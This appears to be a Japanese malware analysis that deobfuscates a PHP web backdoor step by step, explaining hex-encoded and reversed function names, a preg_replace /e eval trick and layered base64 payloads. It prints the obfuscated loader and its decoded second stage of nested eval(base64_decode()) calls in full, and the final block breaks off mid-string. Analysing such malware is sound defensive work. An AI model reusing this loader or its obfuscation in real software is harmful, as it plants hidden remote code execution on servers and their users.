eFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9";
なにかをBASE64エンコードした文字列
//$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65"; $eva1tYlbakBcVSir = "edolpxe";
16進を戻すと、「edolpxe」が出てくる。これは「explode」を逆転させたもの。
//$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166"; $eva1tYldakBcVSir = "strrev";
逆転した文字をもとに戻すための 「strrev」 関数が16進に変換してある。
//$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160"; $eva1tYldakBoVS1r = "ecalper_gerp";
これも16進を元に戻して逆転させると「preg_replace」になる。
//$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\x76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\x76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145"; $eva1tYidokBoVSjr = ';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie';
これも16進を元に戻して逆転させると 「ei@)+.(@:;)”1\”(lave:@eval(base64_decode($eva1tYidakBcVSjr[1]));」という、preg_replaceに使うであろう後方部分が出てくる。一番最初の行に定義されているBASE64をデコードする部分も見える。
//$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r); $eva1tYldokBcVSjr = strrev( "ecalper_gerp" );
この行で、先ほどの逆転16進文字を元に戻している。strrev( “ecalper_gerp” ) → preg_replace
//$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir); $eva1tYldakBcVSjr = strrev( "edolpxe" );
この行で、先ほどの逆転16進文字を元に戻している。strrev( “edolpxe” ) → explode
//$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir); $eva1tYidakBcVSjr = $eva1tYldakBcVSjr( '+', $eva1fYlbakBcVSir );
つまり $eva1tYidakBcVSjr = explode(‘+’,BASE64エンコード文字列);
explodeは第2引数の文字列を第1引数の文字で分割する関数です。つまり、1行目のBASE64文字列の途中に出てくる「+」の文字を境にして、文字列を分割することになります。
これをやると、
Array ( [0] => 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 [1] => aWYgKCFpc3NldCgkZXZhbFVkQ1hURFFFUm1XbkRTKSkge2Z1bmN0aW9uIGV2YWxsd2hWZklWbldQYlQoJHMpeyRlID0gIiI7IGZvciAoJGEgPSAwOyAkYSA8PSBzdHJsZW4oJHMpLTE7ICRhKysgKXskZSAuPSAkc3tzdHJsZW4oJHMpLSRhLTF9O31yZXR1cm4oJGUpO31ldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9QVNmN2t5YU5SbWJCUlhXdk5uUmpGVVdKeFdZMlZHSm9VR1p2TldaazlGTjJVMmNoSkdJdUpYZDBWbWM3QlNLcjFFWnVGRWRaOTJjR05XUVpsRWJoWlhaa2dpUlRKa1pQbDBaaFJGYlBCRmFPMUViaFpYWmc0MmJwUjNZdVZuWiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5MEVTa2htVXpNbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVldQWE5GWm5ORVpWbFZhRk5WYmh4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZMFVDWjJUSmRXWVV4MlRRaG1UTnhXWTJWV1BYWlZjaFpsY3BWMlZVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIjdraUk5UXpWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGwxalFtaEZSVmRFZGlWRlpDeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wSVNQOUVWUzJSMlZKSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDFUWlZwblJ1VjJRc0oyZFJ4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUWHBJU1YxVWxVSVpFTVlObFZ3VWxWNVlVVlZKbFJUSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbHRsVUZabFVGTjFYazB6UW1OMlpOQm5kcE5YVHl4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BraWNxTmxWakYwYWhSR1daUlhNaFpYWmtnaWRsSm5jME5IS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsbHdoVmZJVm5XUGJUKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSXNraUkwWTFSYVZuUlhkbElvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVkdJc2tpSTlrRVdhSkRiSEZtYUtoVldtWjBWaEpDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxCQ0xwSUNNNTBXVVA1a1ZVSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbEJDTHBJU1BCNTJZeGduTVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsQkNMcElDYjRKalcybGpNU0pDS0dObFFtOVVTbkZHVnM5RVVvNVVUc0ZtZGxoU2VoSm5jaEJTUGdRSFVFaDJiemRFZHVSRWRVeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbGx3aFZmSVZuV1BiVCgnOykpIj09d09wa2lJNVFIVkxwblVEdGtlUzVtWXNKbGJpWm5UeWdGTVdKaldtWjFSaUJuV0hGMVowMDJZeElGV2FsSGRJbEVjTmhrU3ZSVGJSMWtUeUlsU3NCRFZhWjBNaHBrU1ZSbFJrWmtZb3BGV2FkR055SUdjU05UVzFabGJhSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbGhDYmhaWFoiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PXdPcGdDTWtSR0pnMERJWXBIUnloMVRJZDJTbnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxsd2hWZklWbldQYlQoJzspKSI9PVFmOXREYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0l2aDJZbHRUWHhzRmFqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJOUFDYWpGRVRhdEdWQ1pGYjFGM1p6TjNjc0ZtZGxSQ0k3a0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDTGxWbGVHNVdaRHhtWTNGRmJoWlhaa2dTWms5R2J3aFhaZzBESW9OV1FNcDFhVUprVnNWWGNuTjNjenhXWTJWR0o3bFNLbFZsZUc1V1pEeG1ZM0ZGYmhaWFprd0NhakZFVGF0R1ZDWkZiMUYzWnpOM2NzRm1kbFJDS3lSM2N5UjNjb0FpWnB0VEtwMFZLaVVsVHhRVlM1WVVWVkpsUlRKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrZ1NaazkyWXVWR2J5Vm5McElTT24xbVNpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWt5UW1OMlpOQm5kcE5YVHl4V1kyVkdKb1VHWnZObWJseG1jMTVTS2lrVFN0cGtJb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZtTGRsaUk5a2tSU1ZrUndnbFJTRkRWT1oxYVZKQ0tHTmxRbTlVU25GR1ZzOUVVbzVVVHNGbWRsdGxVRlpsVUZOMVhrNFNLaTBETVVGbUlvWTBVQ1oyVEpkV1lVeDJUUWhtVE54V1kyVm1McElTUDRRMFlpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSXZKa2JNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVpUW1oRlJWZEVkaVZGWkN4V1kyVkdKdWtpSTkwemRNSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDVDVzZSa2NZOUVTbnQwWnNGbWRsUmlMcElTUDRrSFRpZ2lSVEprWlBsMFpoUkZiUEJGYU8xRWJoWlhadWtpSTkwelpQSkNLR05sUW05VVNuRkdWczlFVW81VVRzRm1kbDV5VldGWFlXSlhhbGRGVnNGbWRsUkNLdUpFVGpkVVNKOVVXeHRXU0MxVVJYeFdZMlZHSTlBQ2FqRkVUYXRHVkNaRmIxRjNaek4zY3NGbWRsUkNJN2tDTXdnRE14c1NLb1VXYnBSSExwa2lJOTBFU2tobVV6TW1Jb1kwVUNaMlRKZFdZVXgyVFFobVROeFdZMlZHSzFRV2JzYzFVa2QyUWtWVldwVjBVdEZHYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hYTkZabk5FWlZsVmFGTlZiaHhXWTJWR0piVlVTTDkwVEQ5RkpvUVhaek5YYW9BaWN2QlNLcE1rWmpkV1R3WlhhejFrY3NGbWRsUkNJc0lTYXZJQ0l1QVNLMEJGUm85MmNIUm5iRVJIVnNGbWRsUkNJc0lDZmlnU1prOUdidzFXYWc0Q0lpOGlJb2cyWTBGV2JmZFdaeUJIS29ZV2EiKGVkb2NlZF80NmVzYWIobGF2ZScpKTskZXZhbFVkQ1hURFFFUm1XbkRTID0xODc5Mjt9 )
上記のように、2つに分けることができました。
//$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061]; $eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.001891];
一つ上の行のexplodeで分割した配列を取り出しますが、[0.001891]はint型に直すと[0]になりますので、先頭の7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn….Jg0DI1UTayZGJが取り出されます。
実はこのコードは一見オトリのようで、表面上は何も実行される部分がないが、解析を進めると後に重要な役割を果たす。
//$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr); $eva1tYidokBcVSjr = $eva1tYldakBcVSjr( ':', $eva1tYidokBoVSjr);
つまり、
$eva1tYidokBcVSjr = explode(':',';))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@:eval("\1");:@(.+)@ie');
を実行している。
ここで、 : を境にして分割するので、
Array ( [0] => ;))]1[rjSVcBkadiYt1ave$(edoced_46esab(lave@ [1] => eval("\1"); [2] => @(.+)@ie )
の3つの配列が取り出される。
//$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031])); $eva1tYldokBcVSjr( $eva1tYidokBcVSjr[2], $eva1tYidokBcVSjr[1], strrev( $eva1tYidokBcVSjr[0.001891]) );
つまり、
preg_replace( "@(.+)@ie", 'eval("\1");', :@eval(base64_decode($eva1tYidakBcVSjr[1])); );
ということ。最初にBASE64文字列を+で分割した後方の[1]側がbase64デコードされることとなる。
ここで、base64_decode(BASE64文字列の+から後方部分) をすると、
if (!isset($evalUdCXTDQERmWnDS)) {function evallwhVfIVnWPbT($s){$e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));$evalUdCXTDQERmWnDS =18792;}
という新しいPHPコードが出現する。evalでコレを評価(実行)している。
そしてこれより下の残りのコードはオトリで意味を持たない。
$eva1tYldakBcVSir = ""; //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYldakBoVS1r = "edolpxe"."edolpxe"; //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYidokBoVSjr = "edolpxe"; //$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72"; $eva1tYldakBcVSir = "strecrptr"; //$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65"; $eva1tYlbakBcVSir = "gao[pxe"; //$eva1tYldakBoVS1r = "\x65\143\x72\160"; $eva1tYldakBoVS1r = "ecrp"; $eva1tYldakBcVSir = ""; //$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir; $eva1tYldakBoVS1r = "gao[pxe"."gao[pxe"; //$eva1tYidokBoVSjr = $eva1tYlbakBcVSir; $eva1tYidokBoVSjr = "gao[pxe"; } ?>
出力された肝心のコードの解析
if (!isset($evalUdCXTDQERmWnDS)) { function evallwhVfIVnWPbT($s){ $e = ""; for ($a = 0; $a <= strlen($s)-1; $a++ ){ $e .= $s{strlen($s)-$a-1}; } return($e); } eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave')); eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRC